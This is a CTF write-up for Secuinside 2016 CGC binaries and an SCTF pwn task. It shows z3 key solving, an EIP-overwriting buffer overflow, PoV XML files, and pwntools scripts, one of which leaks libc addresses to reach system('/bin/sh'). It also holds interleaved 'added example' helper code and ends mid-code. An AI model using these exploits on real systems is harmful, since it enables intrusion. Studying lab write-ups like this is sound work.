_BOOL4 compare_key_sub_8048150()
{
  signed int v1; // [esp+0h] [ebp-4h]@1

  v1 = 0;
  if ( 21_byte_805F468
     + 04_byte_805F457
     + 13_byte_805F460
     + 22_byte_805F469
     + 24_byte_805F46B
     + 08_byte_805F45B
     + 02_byte_805F455
     + 07_byte_805F45A
     + 10_byte_805F45D
     + 18_byte_805F465
     + 12_byte_805F45F
     + 19_byte_805F466
     + 06_byte_805F459 == 1068 )
    v1 = 1;
  if ( 11_byte_805F45E
     + 08_byte_805F45B
     + 10_byte_805F45D
     + 18_byte_805F465
     + 19_byte_805F466
     + 23_byte_805F46A
     + 03_byte_805F456
     + 02_byte_805F455
     + 14_byte_805F461
     + 16_byte_805F463 == 760 )
    ++v1;
  if ( 15_byte_805F462
     + 02_byte_805F455
     + 10_byte_805F45D
     + 17_byte_805F464
     + 01_byte_805F454
     + 14_byte_805F461
     + 16_byte_805F463
     + 12_byte_805F45F
     + 13_byte_805F460
     + 21_byte_805F468
     + 06_byte_805F459
     + 23_byte_805F46A
     + 22_byte_805F469 == 997 )
    ++v1;
  if ( 05_byte_805F458
     + 09_byte_805F45C
     + 20_byte_805F467
     + 22_byte_805F469
     + 02_byte_805F455
     + 07_byte_805F45A
     + 24_byte_805F46B
     + 14_byte_805F461
     + 17_byte_805F464
     + 13_byte_805F460 == 782 )
    ++v1;
  if ( 20_byte_805F467
     + 11_byte_805F45E
     + 19_byte_805F466
     + 17_byte_805F464
     + 14_byte_805F461
     + 03_byte_805F456
     + 08_byte_805F45B
     + 07_byte_805F45A
     + 21_byte_805F468
     + 15_byte_805F462 == 778 )
    ++v1;
  if ( 21_byte_805F468
     + 20_byte_805F467
     + 06_byte_805F459
     + 10_byte_805F45D
     + 05_byte_805F458
     + 15_byte_805F462
     + 23_byte_805F46A
     + 22_byte_805F469
     + 04_byte_805F457
     + 25_byte_805F46C
     + 13_byte_805F460
     + 24_byte_805F46B
     + 19_byte_805F466
     + 14_byte_805F461 == 1123 )
    ++v1;
  if ( 23_byte_805F46A
     + 09_byte_805F45C
     + 06_byte_805F459
     + 14_byte_805F461
     + 16_byte_805F463
     + 12_byte_805F45F
     + 08_byte_805F45B
     + 11_byte_805F45E
     + 02_byte_805F455
     + 19_byte_805F466
     + 01_byte_805F454
     + 15_byte_805F462
     + 20_byte_805F467
     + 03_byte_805F456
     + 24_byte_805F46B == 1180 )
    ++v1;
  if ( 06_byte_805F459
     + 25_byte_805F46C
     + 12_byte_805F45F
     + 24_byte_805F46B
     + 20_byte_805F467
     + 23_byte_805F46A
     + 01_byte_805F454
     + 05_byte_805F458
     + 04_byte_805F457
     + 09_byte_805F45C
     + 14_byte_805F461
     + 21_byte_805F468
     + 19_byte_805F466
     + 03_byte_805F456
     + 10_byte_805F45D
     + 18_byte_805F465
     + 08_byte_805F45B
     + 13_byte_805F460 == 1498 )
    ++v1;
  if ( 19_byte_805F466
     + 24_byte_805F46B
     + 15_byte_805F462
     + 05_byte_805F458
     + 25_byte_805F46C
     + 02_byte_805F455
     + 01_byte_805F454
     + 22_byte_805F469
     + 06_byte_805F459
     + 17_byte_805F464
     + 08_byte_805F45B
     + 13_byte_805F460
     + 16_byte_805F463
     + 21_byte_805F468
     + 04_byte_805F457 == 1213 )
    ++v1;
  if ( 18_byte_805F465
     + 22_byte_805F469
     + 10_byte_805F45D
     + 11_byte_805F45E
     + 07_byte_805F45A
     + 15_byte_805F462
     + 21_byte_805F468
     + 02_byte_805F455
     + 09_byte_805F45C
     + 25_byte_805F46C == 779 )
    ++v1;
  if ( 01_byte_805F454
     + 04_byte_805F457
     + 20_byte_805F467
     + 03_byte_805F456
     + 24_byte_805F46B
     + 23_byte_805F46A
     + 16_byte_805F463
     + 21_byte_805F468
     + 05_byte_805F458 == 742 )
    ++v1;
  if ( 16_byte_805F463
     + 24_byte_805F46B
     + 20_byte_805F467
     + 07_byte_805F45A
     + 18_byte_805F465
     + 11_byte_805F45E
     + 09_byte_805F45C
     + 05_byte_805F458
     + 06_byte_805F459
     + 12_byte_805F45F
     + 02_byte_805F455
     + 10_byte_805F45D
     + 15_byte_805F462
     + 04_byte_805F457
     + 21_byte_805F468 == 1196 )
    ++v1;
  if ( 07_byte_805F45A
     + 02_byte_805F455
     + 09_byte_805F45C
     + 14_byte_805F461
     + 12_byte_805F45F
     + 25_byte_805F46C
     + 13_byte_805F460
     + 22_byte_805F469
     + 19_byte_805F466
     + 24_byte_805F46B
     + 15_byte_805F462
     + 16_byte_805F463
     + 23_byte_805F46A
     + 18_byte_805F465 == 1091 )
    ++v1;
  if ( 22_byte_805F469
     + 18_byte_805F465
     + 23_byte_805F46A
     + 01_byte_805F454
     + 05_byte_805F458
     + 02_byte_805F455
     + 19_byte_805F466
     + 20_byte_805F467
     + 13_byte_805F460 == 764 )
    ++v1;
  if ( 14_byte_805F461
     + 17_byte_805F464
     + 23_byte_805F46A
     + 02_byte_805F455
     + 12_byte_805F45F
     + 25_byte_805F46C
     + 18_byte_805F465
     + 15_byte_805F462
     + 11_byte_805F45E
     + 05_byte_805F458
     + 09_byte_805F45C
     + 08_byte_805F45B
     + 01_byte_805F454
     + 19_byte_805F466
     + 07_byte_805F45A
     + 22_byte_805F469
     + 21_byte_805F468
     + 10_byte_805F45D == 1463 )
    ++v1;
  if ( 16_byte_805F463 + 09_byte_805F45C + 02_byte_805F455 + 12_byte_805F45F + 22_byte_805F469 + 20_byte_805F467 == 465 )
    ++v1;
  if ( 17_byte_805F464
     + 19_byte_805F466
     + 12_byte_805F45F
     + 25_byte_805F46C
     + 05_byte_805F458
     + 20_byte_805F467
     + 13_byte_805F460
     + 02_byte_805F455
     + 07_byte_805F45A
     + 14_byte_805F461
     + 01_byte_805F454
     + 22_byte_805F469 == 955 )
    ++v1;
  if ( 07_byte_805F45A
     + 08_byte_805F45B
     + 22_byte_805F469
     + 19_byte_805F466
     + 01_byte_805F454
     + 10_byte_805F45D
     + 15_byte_805F462
     + 18_byte_805F465 == 654 )
    ++v1;
  if ( 02_byte_805F455
     + 03_byte_805F456
     + 17_byte_805F464
     + 13_byte_805F460
     + 24_byte_805F46B
     + 01_byte_805F454
     + 11_byte_805F45E
     + 07_byte_805F45A
     + 21_byte_805F468
     + 19_byte_805F466
     + 23_byte_805F46A
     + 08_byte_805F45B
     + 16_byte_805F463 == 1030 )
    ++v1;
  if ( 23_byte_805F46A + 24_byte_805F46B + 12_byte_805F45F == 275 )
    ++v1;
  if ( 22_byte_805F469
     + 04_byte_805F457
     + 02_byte_805F455
     + 21_byte_805F468
     + 01_byte_805F454
     + 09_byte_805F45C
     + 13_byte_805F460 == 563 )
    ++v1;
  if ( 15_byte_805F462 + 06_byte_805F459 + 12_byte_805F45F + 19_byte_805F466 + 18_byte_805F465 + 25_byte_805F46C == 509 )
    ++v1;
  if ( 20_byte_805F467
     + 11_byte_805F45E
     + 13_byte_805F460
     + 22_byte_805F469
     + 17_byte_805F464
     + 25_byte_805F46C
     + 15_byte_805F462 == 556 )
    ++v1;
  if ( 02_byte_805F455
     + 13_byte_805F460
     + 22_byte_805F469
     + 20_byte_805F467
     + 19_byte_805F466
     + 03_byte_805F456
     + 04_byte_805F457
     + 12_byte_805F45F
     + 16_byte_805F463
     + 24_byte_805F46B
     + 23_byte_805F46A
     + 18_byte_805F465
     + 25_byte_805F46C
     + 09_byte_805F45C
     + 06_byte_805F459
     + 11_byte_805F45E
     + 21_byte_805F468
     + 17_byte_805F464 == 1464 )
    ++v1;
  if ( 15_byte_805F462
     + 22_byte_805F469
     + 08_byte_805F45B
     + 23_byte_805F46A
     + 21_byte_805F468
     + 06_byte_805F459
     + 17_byte_805F464
     + 11_byte_805F45E
     + 12_byte_805F45F == 758 )
    ++v1;
  return v1 == 25;
}

Substitute the variables here as follows and use z3, a solver library usable from Python, to find the values that satisfy them.

(※ z3 : https://github.com/Z3Prover/z3)

babyhack@ubuntu:~$ python scripts/mk_make.py --python --pypkgdir=/usr/lib/python2.7/dist-packages

babyhack@ubuntu:~$ cd ./build/make; sudo make install


Once z3 is ready, the following code does the job.


from z3 import *

var_0 = Int('var_0')
var_1 = Int('var_1')
var_2 = Int('var_2')
var_3 = Int('var_3')
var_4 = Int('var_4')
var_5 = Int('var_5')
var_6 = Int('var_6')
var_7 = Int('var_7')
var_8 = Int('var_8')
var_9 = Int('var_9')
var_10 = Int('var_10')
var_11 = Int('var_11')
var_12 = Int('var_12')
var_13 = Int('var_13')
var_14 = Int('var_14')
var_15 = Int('var_15')
var_16 = Int('var_16')
var_17 = Int('var_17')
var_18 = Int('var_18')
var_19 = Int('var_19')
var_20 = Int('var_20')
var_21 = Int('var_21')
var_22 = Int('var_22')
var_23 = Int('var_23')
var_24 = Int('var_24')
var_25 = Int('var_25')

solve(var_20 + var_3 + var_12 + var_21 + var_23 + var_7 + var_1 + var_6 + var_9 + var_17 + var_11 + var_18 + var_5 == 1068,
      var_10 + var_7 + var_9 + var_17 + var_18 + var_22 + var_2 + var_1 + var_13 + var_15 == 760,
      var_14 + var_1 + var_9 + var_16 + var_0 + var_13 + var_15 + var_11 + var_12 + var_20 + var_5 + var_22 + var_21 == 997,
      var_4 + var_8 + var_19 + var_21 + var_1 + var_6 + var_23 + var_13 + var_16 + var_12 == 782,
      var_19 + var_10 + var_18 + var_16 + var_13 + var_2 + var_7 + var_6 + var_20 + var_14 == 778,
      var_20 + var_19 + var_5 + var_9 + var_4 + var_14 + var_22 + var_21 + var_3 + var_24 + var_12 + var_23 + var_18 + var_13 == 1123,
      var_22 + var_8 + var_5 + var_13 + var_15 + var_11 + var_7 + var_10 + var_1 + var_18 + var_0 + var_14 + var_19 + var_2 + var_23 == 1180,
      var_5 + var_24 + var_11 + var_23 + var_19 + var_22 + var_0 + var_4 + var_3 + var_8 + var_13 + var_20 + var_18 + var_2 + var_9 + var_17 + var_7 + var_12 == 1498,
      var_18 + var_23 + var_14 + var_4 + var_24 + var_1 + var_0 + var_21 + var_5 + var_16 + var_7 + var_12 + var_15 + var_20 + var_3 == 1213,
      var_17 + var_21 + var_9 + var_10 + var_6 + var_14 + var_20 + var_1 + var_8 + var_24 == 779,
      var_0 + var_3 + var_19 + var_2 + var_23 + var_22 + var_15 + var_20 + var_4 == 742,
      var_15 + var_23 + var_19 + var_6 + var_17 + var_10 + var_8 + var_4 + var_5 + var_11 + var_1 + var_9 + var_14 + var_3 + var_20 == 1196,
      var_6 + var_1 + var_8 + var_13 + var_11 + var_24 + var_12 + var_21 + var_18 + var_23 + var_14 + var_15 + var_22 + var_17 == 1091,
      var_21 + var_17 + var_22 + var_0 + var_4 + var_1 + var_18 + var_19 + var_12 == 764,
      var_13 + var_16 + var_22 + var_1 + var_11 + var_24 + var_17 + var_14 + var_10 + var_4 + var_8 + var_7 + var_0 + var_18 + var_6 + var_21 + var_20 + var_9 == 1463,
      var_15 + var_8 + var_1 + var_11 + var_21 + var_19 == 465,
      var_16 + var_18 + var_11 + var_24 + var_4 + var_19 + var_12 + var_1 + var_6 + var_13 + var_0 + var_21 == 955,
      var_6 + var_7 + var_21 + var_18 + var_0 + var_9 + var_14 + var_17 == 654,
      var_1 + var_2 + var_16 + var_12 + var_23 + var_0 + var_10 + var_6 + var_20 + var_18 + var_22 + var_7 + var_15 == 1030,
      var_22 + var_23 + var_11 == 275,
      var_21 + var_3 + var_1 + var_20 + var_0 + var_8 + var_12 == 563,
      var_14 + var_5 + var_11 + var_18 + var_17 + var_24 == 509,
      var_19 + var_10 + var_12 + var_21 + var_16 + var_24 + var_14 == 556,
      var_1 + var_12 + var_21 + var_19 + var_18 + var_2 + var_3 + var_11 + var_15 + var_23 + var_22 + var_17 + var_24 + var_8 + var_5 + var_10 + var_20 + var_16 == 1464,
      var_14 + var_21 + var_7 + var_22 + var_20 + var_5 + var_16 + var_10 + var_11 == 758)


[ result ]


babyhack@ubuntu:~/tmp/Secuinside/2016$ python exp.py
[var_16 = 89,
 var_23 = 85,
 var_20 = 82,
 var_1 = 72,
 var_6 = 69,
 var_12 = 77,
 var_15 = 51,
 var_19 = 85,
 var_22 = 95,
 var_21 = 78,
 var_5 = 77,
 var_14 = 78,
 var_11 = 95,
 var_9 = 72,
 var_3 = 87,
 var_10 = 69,
 var_17 = 95,
 var_4 = 95,
 var_7 = 95,
 var_8 = 84,
 var_2 = 79,
 var_13 = 48,
 var_18 = 84,
 var_24 = 80,
 var_0 = 83]
babyhack@ubuntu:~/tmp/Secuinside/2016$  


Because the solver prints the values in decimal, a small script is needed to turn them back into characters.


[ convert ]


babyhack@ubuntu:~/tmp/Secuinside/2016$ cat sort.py
var_16 = 89
var_23 = 85
var_20 = 82
var_1 = 72
var_6 = 69
var_12 = 77
var_15 = 51
var_19 = 85
var_22 = 95
var_21 = 78
var_5 = 77
var_14 = 78
var_11 = 95
var_9 = 72
var_3 = 87
var_10 = 69
var_17 = 95
var_4 = 95
var_7 = 95
var_8 = 84
var_2 = 79
var_13 = 48
var_18 = 84
var_24 = 80
var_0 = 83

print chr(var_0)+chr(var_1)+chr(var_2)+chr(var_3)+chr(var_4)+chr(var_5)+chr(var_6)+chr(var_7)+chr(var_8)+chr(var_9)+chr(var_10)+chr(var_11)+chr(var_12)+chr(var_13)+chr(var_14)+chr(var_15)+chr(var_16)+chr(var_17)+chr(var_18)+chr(var_19)+chr(var_20)+chr(var_21)+chr(var_22)+chr(var_23)+chr(var_24)
babyhack@ubuntu:~/tmp/Secuinside/2016$


[ result ]


babyhack@ubuntu:~/tmp/Secuinside/2016$ python sort.py
SHOW_ME_THE_M0N3Y_TURN_UP
babyhack@ubuntu:~/tmp/Secuinside/2016$ 


Now let's test what we found.


 vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : HOW_ME_THE_M0N3Y_TURN_UP
Get out of here :(
vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: SHOW_ME_THE_M0N3Y_TURN_UP
Hi SHOW_ME_THE_M0N3Y_TURN_UP
:

vagrant@crs:~$
vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : SHOW_ME_THE_M0N3Y_TURN_UP
Welcome Admin :)
: CK
Segmentation fault (core dumped)
vagrant@crs:~$



The PoV submitted to CGC is written as XML, based on the sample code.


<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">
<pov>
    <cbid>service</cbid>

    <replay>
        <!-- recv -->
        <read><delim>\x0a</delim><match><data>----------------------------------------\x0a</data></match></read>
        <read><delim>\x0a</delim><match><data>-          Simple Echo System          -\x0a</data></match></read>
        <read><delim>\x0a</delim><match><data>----------------------------------------\x0a</data></match></read>
        <read><delim>\x0a</delim><match><data>What is your name?\x0a</data></match></read>
        <read><delim>\x0a</delim><match><data>name: \x0a</data></match></read>
        <!-- send -->
        <write><data>ADMIN\x0a</data></write>

        <!-- recv -->
        <read><delim>\x0a</delim><match><data>+ Gimme a key : \x0a</data></match></read>
        <!-- send -->
        <write><data>SHOW_ME_THE_M0N3Y_TURN_UP\x0a</data></write>
        <!-- recv -->
        <read><delim>\x0a</delim><match><data>Welcome Admin :)\x0a</data></match></read>
        <read><delim>\x0a</delim><match><data>: \x0a</data></match></read>

        <!-- send -->
        <write><data>CK\x0a</data></write>
    </replay>
</pov>


The exploit code is as follows.


#!/usr/bin/python
from pwn import *

xml_name = "pov.xml"
host, port = "127.0.0.1", 1234
r = remote(host, port)
print(r.recvline())
r.sendline("XML")                    # announce that a PoV XML document follows
payload = open(xml_name, 'rb').read()
print(r.recvline())
r.sendline(str(len(payload)))        # length of the document, then the document itself
print(r.recvline())
r.sendline(payload)

r.interactive()



SecuInside 2016 - CGC/cykor_00001-100



1. Convert the CGC file to ELF format


vagrant@crs:~$ cgc2elf cykor_00001
vagrant@crs:~$ ls
cykor_00001 


2. The VM is reached over SSH, so copy the file out with sftp and analyze it in IDA


signed int sub_80481C0()
{
  char v1; // [esp+3Ch] [ebp-2Ch]@3
  char v2; // [esp+3Dh] [ebp-2Bh]@9
  char v3; // [esp+3Eh] [ebp-2Ah]@10
  char v4; // [esp+3Fh] [ebp-29h]@11
  char v5; // [esp+40h] [ebp-28h]@12
  char v6; // [esp+41h] [ebp-27h]@13
  char v7; // [esp+42h] [ebp-26h]@14
  char v8; // [esp+43h] [ebp-25h]@15
  char v9; // [esp+44h] [ebp-24h]@16
  char v10; // [esp+45h] [ebp-23h]@17
  char v11; // [esp+46h] [ebp-22h]@18
  char v12; // [esp+47h] [ebp-21h]@19
  char v13; // [esp+48h] [ebp-20h]@20
  char v14; // [esp+49h] [ebp-1Fh]@21
  char v15; // [esp+4Ah] [ebp-1Eh]@22
  char v16; // [esp+4Bh] [ebp-1Dh]@23
  int v17; // [esp+54h] [ebp-14h]@26
  unsigned int i; // [esp+58h] [ebp-10h]@1
  int v19; // [esp+60h] [ebp-8h]@1

  v19 = 0;
  for ( i = 0; i < 0x18; ++i )
    *(&v1 + i) = 0;
  if ( sub_8048470(1, (int)"What is your message?\n", 0x16u) )
    sub_804867C(0);
  if ( sub_8048560(0, (int)&v1, 0x18u, 10) )
    return -1;
  if ( v1 != 'H' || v2 != '4' )
    return 7;
  if ( v3 != 'P' || v4 != 'P' )
    return 6;
  if ( v5 != 'Y' || v6 != '_' )
    return 5;
  if ( v7 != 'S' || v8 != '3' )
    return 4;
  if ( v9 != 'C' || v10 != 'U' )
    return 3;
  if ( v11 != 'I' || v12 != 'N' )
    return 2;
  if ( v13 != 'S' || v14 != 'I' )
    return 1;
  if ( v15 == 'D' && v16 == '3' && sub_8048470(1, (int)"+ Are you serious?\n", 0x13u) )
    sub_804867C(0);
  v17 = sub_8048 


--> H4PPY_S3CUINSID3


3. Identify the vulnerable function


signed int sub_80480A0()
{
  char v1[64]; // [esp+28h] [ebp-50h]@3
  int v2; // [esp+68h] [ebp-10h]@1
  unsigned int i; // [esp+6Ch] [ebp-Ch]@1

  v2 = 0;
  for ( i = 0; i < 64; ++i )
    v1[i] = 0;
  if ( sub_8048560(0, (int)v1, 128u, 10) )
    return -1;
  for ( i = 0; v1[i]; ++i )
    ++v2;
  if ( sub_8048470(1, (int)"- Why so serious?\n", 0x12u) )
    sub_804867C(0);
  return v2;
}


--> Supplying 80 or more bytes of input triggers a BOF (EIP overwrite confirmed)


vagrant@crs:~$ (python -c 'print "H4PPY_S3CUINSID3" + "\n" + "a"*84 + "b"*4';cat ) |./cykor_00001_cgc_file
What is your message?
+ Are you serious?
- Why so serious?

Segmentation fault (core dumped)
vagrant@crs:~$ gdb ./cykor_00001_cgc_file core
GNU gdb (GDB) 7.9
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./cykor_00001_cgc_file...(no debugging symbols found)...done.

warning: core file may not match specified executable file.
[New LWP 3833]
Core was generated by `'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x62626262 in ?? ()
(gdb) i r
eax            0x616161a6       1633771942
ecx            0x12     18
edx            0x80487bf        134514623
ebx            0x0      0
esp            0xbaaaaf8c       0xbaaaaf8c
ebp            0x61616161       0x61616161
esi            0x61616161       1633771873
edi            0x0      0
eip            0x62626262       0x62626262
eflags         0x10292  [ AF SF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x7b     123
gs             0x7b     123
(gdb) q
vagrant@crs:~$ 
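As an added example that is not the writeup's own code, the offset above confirmed from the crash itself rather than guessed from the frame layout: a de Bruijn pattern in which every 4-byte window is unique, so whatever bytes land in EIP name their own input offset. It assumes the 128-byte read limit and the [ebp-50h] buffer position shown in the decompilation; the pattern helper is modelled on the pwntools cyclic utility but implemented here in plain Python.

```python
import struct
from itertools import islice

READ_LIMIT = 128        # sub_8048560(0, v1, 128u, 10): at most 128 bytes are read into v1
BUF_EBP_OFFSET = 0x50   # char v1[64] sits at [ebp-50h] in the decompilation above

def ret_addr_offset(buf_ebp_offset=BUF_EBP_OFFSET):
    """Bytes from the start of v1 to the return address: reach ebp, then skip saved ebp."""
    return buf_ebp_offset + 4

def _de_bruijn(alphabet, n):
    """FKM generator for a de Bruijn sequence: every n-symbol window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)

def cyclic(length, alphabet=b"abcdefghijklmnopqrstuvwxyz"):
    """First `length` bytes of a pattern whose 4-byte windows are all distinct."""
    return bytes(islice(_de_bruijn(alphabet, 4), length))

def cyclic_find(eip, length=READ_LIMIT):
    """Input offset of the bytes that ended up in EIP (int, little-endian, or raw bytes); -1 if absent."""
    needle = struct.pack("<I", eip) if isinstance(eip, int) else eip
    return cyclic(length).find(needle)

def faulting_bytes(eip):
    """The input bytes a faulting 32-bit EIP corresponds to, e.g. 0x62626262 -> b'bbbb'."""
    return struct.pack("<I", eip)
```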


4. Write the XML in the CGC PoV format

 ※ References

   1) http://kblab.tistory.com/287

   2) https://cgc-docs.legitbs.net/cgc-release-documentation/walk-throughs/understanding-cfe-povs/

   3) https://github.com/CyberGrandChallenge/cgc-release-documentation/blob/master/walk-throughs/pin-for-decree.md


<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">
<pov>
    <cbid>service</cbid>

    <replay>
        <!-- recv -->
        <read><delim>\x0a</delim><match><data>What is your message?\x0a</data></match></read>
        <!-- send -->
        <write><data>H4PPY_S3CUINSID3\x0a</data></write>

        <!-- recv -->
        <read><delim>\x0a</delim><match><data>+ Are you serious?\x0a</data></match></read>
        <!-- send, [a * 84] -->
        <write><data>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x0a</data></write>

        <!-- recv: the binary prints "- Why so serious?" after the overlong read (see the run above) -->
        <read><delim>\x0a</delim><match><data>- Why so serious?\x0a</data></match></read>
    </replay>
</pov>


5. Send the file


from pwn import *

r = remote('127.0.0.1', 1234)   # PoV server address as used in the other examples on this blog

payload = open('crattack.xml', 'rb').read()

print(r.recvuntil('XML)'))

r.sendline(payload)

print(r.recv())

r.interactive()




  • vagrant is a product for managing VM images.
    • https://www.vagrantup.com/
  • VirtualBox
    • https://www.virtualbox.org/
  • CGC environment configuration file
    • https://s3.amazonaws.com/cgcdist/boxes/Vagrantfile
  • CGC description
    • https://github.com/CyberGrandChallenge/cgc-release-documentation/blob/master/walk-throughs/virtual-competiton.md



1. Download the virtual machines with the vagrant command.


Copy the CGC configuration file (Vagrantfile) into the vagrant folder.


2016-08-02  오후 02:28    <DIR>          .
2016-08-02  오후 02:28    <DIR>          ..
2016-08-02  오후 02:28    <DIR>          .vagrant
2015-12-21  오후 10:33         2,526,208 vagrant.exe
2016-08-02  오후 12:14             2,573 Vagrantfile

C:\HashiCorp\Vagrant\bin>vagrant.exe up
Bringing machine 'cb' up with 'virtualbox' provider...
Bringing machine 'ids' up with 'virtualbox' provider...
Bringing machine 'pov' up with 'virtualbox' provider...
Bringing machine 'crs' up with 'virtualbox' provider...
Bringing machine 'ti' up with 'virtualbox' provider...
==> cb: Checking if box 'cgc-linux-dev' is up to date...
==> cb: Clearing any previously set forwarded ports...
==> cb: Clearing any previously set network interfaces...
==> cb: Preparing network interfaces based on configuration...
    cb: Adapter 1: nat
    cb: Adapter 2: hostonly
==> cb: Forwarding ports...
    cb: 22 (guest) => 2222 (host) (adapter 1)
==> cb: Running 'pre-boot' VM customizations...
==> cb: Booting VM...
==> cb: Waiting for machine to boot. This may take a few minutes...
    cb: SSH address: 127.0.0.1:2222
    cb: SSH username: vagrant
    cb: SSH auth method: private key

............

C:\HashiCorp\Vagrant\bin>vagrant.exe status
Current machine states:

cb                        running (virtualbox)
ids                       running (virtualbox)
pov                       running (virtualbox)
crs                       running (virtualbox)
ti                        running (virtualbox)

This environment represents multiple VMs. The VMs are all listed
above with their current state. For more information about a specific
VM, run `vagrant status NAME`.

.....................

C:\HashiCorp\Vagrant\bin>vagrant.exe ssh crs
`ssh` executable not found in any directories in the %PATH% variable. Is an
SSH client installed? Try installing Cygwin, MinGW or Git, all of which
contain an SSH client. Or use your favorite SSH client with the following
authentication information shown below:

Host: 127.0.0.1
Port: 2202
Username: vagrant
Private key: C:/Users/JP20614/.vagrant.d/insecure_private_key

2. To use the PuTTY client, a private key in PuTTY's format must be generated with puttygen.exe.


3. PuTTY client settings

  - ID : vagrant

  - IP : 127.0.0.1

  - Port : 2202


4. CGC server roles

  • ti - this is the Team Interface. The role represents the interface that will be provided to a CRS by the CFE infrastructure.
  • cb - this is the Challenge Binary server. This is the host where CBs are executed.
  • pov - this is the POV server. This role has the responsibility of 'throwing' POVs (and polls) at the cb server.
  • crs - this is a host for simulating a CRS. While no simulated CRS capabilities are distributed as part of Virtual Competition, a sample client is provided to exercise the Team Interface.
  • ids - this is the IDS host; the network appliance. Filters fielded by a CRS will be installed on ids. From a network perspective, ids is in between pov and cb.





[ pwn example code ]

 

from pwn import *


#r = process('./pwn1')
r = remote('127.0.0.1', 1234)

# '-1', 44 bytes of padding, then the 4-byte little-endian return address 0x080484cd
payload = b'-1'
payload += b'a' * 44
payload += b'\xcd\x84\x04\x08'
payload += b'\n'

print('[*] payload\n%s' % hexdump(payload))

r.sendline(payload)
print(r.recv())

#r.interactive()

 

[ Sending the XML file ]


from pwn import *


r = remote('127.0.0.1', 1234)

payload = open('crattack.xml', 'rb').read()


print(r.recvuntil('XML)'))

r.sendline(payload)


r.interactive()



 

[ Checking the libraries in use ]

 

babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -r ./pwn2

Relocation section '.rel.dyn' at offset 0x2fc contains 2 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ffc  00000306 R_386_GLOB_DAT    00000000   __gmon_start__
0804a040  00000705 R_386_COPY        0804a040   stdout

Relocation section '.rel.plt' at offset 0x30c contains 6 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   printf
0804a010  00000207 R_386_JUMP_SLOT   00000000   getchar
0804a014  00000307 R_386_JUMP_SLOT   00000000   __gmon_start__
0804a018  00000407 R_386_JUMP_SLOT   00000000   __libc_start_main
0804a01c  00000507 R_386_JUMP_SLOT   00000000   setvbuf
0804a020  00000607 R_386_JUMP_SLOT   00000000   atoi
babyhack@ubuntu:~/tmp/sctf2016/pwn2$  

 

 

[ Finding the offsets ]

 

# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep 'system' | more
#   244: 00115db0    68 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
#   621: 0003b160    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
#  1445: 0003b160    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0

# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ strings -a -tx /lib/i386-linux-gnu/libc.so.6 | grep '/bin/sh'
# 15f5db /bin/sh


# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep 'printf' | more
#.............................
#   641: 0004a130    45 FUNC    GLOBAL DEFAULT   12 printf@@GLIBC_2.0
#.............................

offset_printf = 0x4A130
offset_system = 0x3B160
offset_binsh = 0x15F5DB

#------------ printf_got leak -------#
#    +----------------------------+
#    |       aaaaaa.....aaaa      |
#    +----------------------------+
#    |         printf_plt         |
#    +----------------------------+
#    |           vuln()           |
#    +----------------------------+
#    |            '%s'            |
#    +----------------------------+
#    |         printf_got         |
#    +----------------------------+

 

# printf_plt, vuln, string_format and printf_got must already hold p32()-packed
# addresses taken from the binary, and `s` the pwntools connection, before this runs.
payload += printf_plt
payload += vuln
payload += string_format
payload += printf_got

print('[*] payload\n%s\n' % hexdump(payload))

s.sendline(payload)

print('[*] first recv\n%s\n' % s.recvline())
print('[*] second recv\n%s\n' % s.recvline())

# printf("%s", printf_got) echoes the libc address printf resolved to
printf_got_leak = s.recvline()
print('[*] printf got\n%s\n' % hexdump(printf_got_leak))

libc_printf_got = hex(u32(printf_got_leak[:4]))

print('[*] lib_printf_got : ', libc_printf_got)

libc_addr = int(libc_printf_got, 16) - offset_printf
system_addr = libc_addr + offset_system
binsh_addr = libc_addr + offset_binsh

print('[*] libc addr : ', hex(libc_addr))
print('[*] system addr : ', hex(system_addr))
print('[*] /bin/sh addr : ', hex(binsh_addr))
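Pulling the offsets out of the tool output instead of copying them by hand, as an added example that is not the post's own code: it parses the readelf -s and strings -tx lines quoted above, insists on an exact symbol name so that 'system' cannot be confused with svcerr_systemerr or __libc_system the way a bare grep allows, and rejects a leaked address that does not yield a page-aligned libc base (the usual sign of a mismatched libc build). The sample text is constructed from the lines shown above.

```python
import re
import struct

# Constructed sample input: the readelf -s and strings -tx lines quoted above.
READELF_OUT = """\
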